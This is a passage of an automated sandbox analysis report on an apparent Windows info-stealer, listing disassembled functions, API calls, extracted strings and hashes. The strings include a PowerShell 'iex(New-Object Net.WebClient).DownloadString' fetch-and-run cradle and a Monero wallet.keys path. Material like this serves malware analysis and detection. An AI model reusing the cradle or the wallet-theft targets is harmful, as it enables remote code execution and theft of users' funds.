                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$CloseOpenQueryValuememset
                  • String ID:
                  • API String ID: 2623679115-0
                  • Opcode ID: ae15578b6f3369e832daa6541a55b6773caca0fef2a878bb13aeca6d87f6dadc
                  • Instruction ID: e39e842f9667e8e5de719480479b2e2e80cf5daa6756405f472ed04bfb5ef73c
                  • Opcode Fuzzy Hash: ae15578b6f3369e832daa6541a55b6773caca0fef2a878bb13aeca6d87f6dadc
                  • Instruction Fuzzy Hash: 0541E8BAD401086BDB24EBA0DC46FFE733DAB89300F044558B615571C1EA755B8DDBD2
                  Function 00C099C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                  Download Yara Rule
                  APIs
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C099EC
                  • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00C09A11
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00C09A31
                  • ReadFile.KERNEL32(000000FF,?,00000000,00C0148F,00000000), ref: 00C09A5A
                  • LocalFree.KERNEL32(00C0148F), ref: 00C09A90
                  • CloseHandle.KERNEL32(000000FF), ref: 00C09A9A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                  • String ID:
                  • API String ID: 2311089104-0
                  • Opcode ID: 170b48d19cc0e637c8c41f76cefed7baa3aac2d2b897615e0c91d774d3f5b28e
                  • Instruction ID: 81d49d931c55c1f1a39ff6c37f7af440e6d83e3cf0b433a664505e478632946d
                  • Opcode Fuzzy Hash: 170b48d19cc0e637c8c41f76cefed7baa3aac2d2b897615e0c91d774d3f5b28e
                  • Instruction Fuzzy Hash: 84316BB4A00209EFDB14CF95C889BEEB7B5FF49310F108158E911A72D0C778AA85DFA1
                  Function 00C1C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Typememset
                  • String ID:
                  • API String ID: 3530896902-3916222277
                  • Opcode ID: fb93dbf6f71089481f6530b6a99c9774677b8b197c0db6c208876dbfd24740ae
                  • Instruction ID: 03f4f825a75606a1af75f11d318414746bfb52f2b90ee38235df7fc4d745e611
                  • Opcode Fuzzy Hash: fb93dbf6f71089481f6530b6a99c9774677b8b197c0db6c208876dbfd24740ae
                  • Instruction Fuzzy Hash: 194105B114075C9EDB218B248CC4FFBBBE89F06304F1444A8E99A86182D2719B85EF60
                  Function 00C14780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,0179E718), ref: 00C147DB
                    • Part of subcall function 00C18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00C14801
                  • lstrcat.KERNEL32(?,?), ref: 00C14820
                  • lstrcat.KERNEL32(?,?), ref: 00C14834
                  • lstrcat.KERNEL32(?,0178BAA0), ref: 00C14847
                  • lstrcat.KERNEL32(?,?), ref: 00C1485B
                  • lstrcat.KERNEL32(?,0179D9C0), ref: 00C1486F
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C18D90: GetFileAttributesA.KERNEL32(00000000,?,00C01B54,?,?,00C2564C,?,?,00C20E1F), ref: 00C18D9F
                    • Part of subcall function 00C14570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00C14580
                    • Part of subcall function 00C14570: RtlAllocateHeap.NTDLL(00000000), ref: 00C14587
                    • Part of subcall function 00C14570: wsprintfA.USER32 ref: 00C145A6
                    • Part of subcall function 00C14570: FindFirstFileA.KERNEL32(?,?), ref: 00C145BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: c1652d87121ef7bc2cdd728ed395ff3130e515287b07cd48a23b6106b1e3984c
                  • Instruction ID: 3d3f446205ddee2a424419bcf82f68a706cb70f61b29a024f7e225c2d3bd889e
                  • Opcode Fuzzy Hash: c1652d87121ef7bc2cdd728ed395ff3130e515287b07cd48a23b6106b1e3984c
                  • Instruction Fuzzy Hash: 2531A2BAD402086BDB14FBB0DC86EED737CAB49700F444598B319A6081EE7097CDEB95
                  Function 00C12C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A920: lstrcpy.KERNEL32(00000000,?), ref: 00C1A972
                    • Part of subcall function 00C1A920: lstrcat.KERNEL32(00000000), ref: 00C1A982
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00C12D85
                  Strings
                  • ')", xrefs: 00C12CB3
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00C12CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00C12D04
                  • <, xrefs: 00C12D39
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: 9edf8b712fe173ae415af55b3521abab1046520a95f1e080246ddba282500288
                  • Instruction ID: 04861e6f120548c5b3a61287e856a19f7720f5c5743c176fd3ed19b1f2fd6c84
                  • Opcode Fuzzy Hash: 9edf8b712fe173ae415af55b3521abab1046520a95f1e080246ddba282500288
                  • Instruction Fuzzy Hash: F741EA718112089AEB14EBA1D992FEDBB74AF11310F504029E016A61D2EF746ACAFF91
                  Function 00C09E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00C09F41
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 0bdef3c5272be30f0874ff4a6e18a95213914f1138e6827eff8f670053b6e034
                  • Instruction ID: 1cbb075b125f1779658a78ce6323737f6af64db65902349a49e1628fb4ef063a
                  • Opcode Fuzzy Hash: 0bdef3c5272be30f0874ff4a6e18a95213914f1138e6827eff8f670053b6e034
                  • Instruction Fuzzy Hash: A3615B70A00208EFDB24EFA4DC96BED7775AF45304F048018F90A5F1D2EB706A46EB92
                  Function 00C16920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 00C1696C
                  • sscanf.NTDLL ref: 00C16999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C169B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00C169C0
                  • ExitProcess.KERNEL32 ref: 00C169DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 9d7929c83a31f3d1f273271652faf2772ee72bd59c411e2fd881291fc2737d86
                  • Instruction ID: 515ebe12387c47dd850e6b513e8c5d0c7bbeba29a337cf2edaf7207f0162078d
                  • Opcode Fuzzy Hash: 9d7929c83a31f3d1f273271652faf2772ee72bd59c411e2fd881291fc2737d86
                  • Instruction Fuzzy Hash: 1321EA75D04208AFDF08EFE4D9499EEB7B5FF49300F04852AE416B3250EB345609DB65
                  Function 00C17E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C17E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,0178C3E8,00000000,00020119,?), ref: 00C17E5E
                  • RegQueryValueExA.ADVAPI32(?,0179DC60,00000000,00000000,000000FF,000000FF), ref: 00C17E7F
                  • RegCloseKey.ADVAPI32(?), ref: 00C17E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 1ec1c4f94891c0c4ef7b297c4ea6636c8d8d801df185e3b097e45093a3b5cd9f
                  • Instruction ID: dbe3db6597f86973da2149d1e892942129b972fa2de7133a3f14e8cea09ff90e
                  • Opcode Fuzzy Hash: 1ec1c4f94891c0c4ef7b297c4ea6636c8d8d801df185e3b097e45093a3b5cd9f
                  • Instruction Fuzzy Hash: 9A1191B5A84205EFD714CF96DC49FBBBBB8EB09710F104229F615A7280D77458059BA1
                  Function 00C19260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(0179E868,?,?,?,00C1140C,?,0179E868,00000000), ref: 00C1926C
                  • lstrcpyn.KERNEL32(00E4AB88,0179E868,0179E868,?,00C1140C,?,0179E868), ref: 00C19290
                  • lstrlen.KERNEL32(?,?,00C1140C,?,0179E868), ref: 00C192A7
                  • wsprintfA.USER32 ref: 00C192C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 439b94f8720b6b6e9059d20ed3b2ab05af0b9f9d6779bf9fc68c482fdb7c49e8
                  • Instruction ID: 595d8ad215dd53df19a083e269d5ec36e1601a6aa33e4e60e6d1a3c20512a49d
                  • Opcode Fuzzy Hash: 439b94f8720b6b6e9059d20ed3b2ab05af0b9f9d6779bf9fc68c482fdb7c49e8
                  • Instruction Fuzzy Hash: DD012175940208FFCB04DFECD998EAE7BB9EF49364F148158F909AB300C631AA41DB91
                  Function 00C012A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C012B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C012BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00C012D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00C012F5
                  • RegCloseKey.ADVAPI32(?), ref: 00C012FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 25c987714010c5f44827efbef25450c01b53516e1ca93c8708e47adbd49b6afe
                  • Instruction ID: 4b3622533d9d6d38c37686883128bde145fe37f84e1c383ef1441dfa457584d1
                  • Opcode Fuzzy Hash: 25c987714010c5f44827efbef25450c01b53516e1ca93c8708e47adbd49b6afe
                  • Instruction Fuzzy Hash: CD011DB9A40208BFDB14DFE1DC49FAEB7B8EB48711F048169FA05A7280D6749A058F51
                  Function 00C16630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00C16663
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                    • Part of subcall function 00C1A9B0: lstrlen.KERNEL32(?,017991A0,?,\Monero\wallet.keys,00C20E17), ref: 00C1A9C5
                    • Part of subcall function 00C1A9B0: lstrcpy.KERNEL32(00000000), ref: 00C1AA04
                    • Part of subcall function 00C1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C1AA12
                    • Part of subcall function 00C1A8A0: lstrcpy.KERNEL32(?,00C20E17), ref: 00C1A905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 00C16726
                  • ExitProcess.KERNEL32 ref: 00C16755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
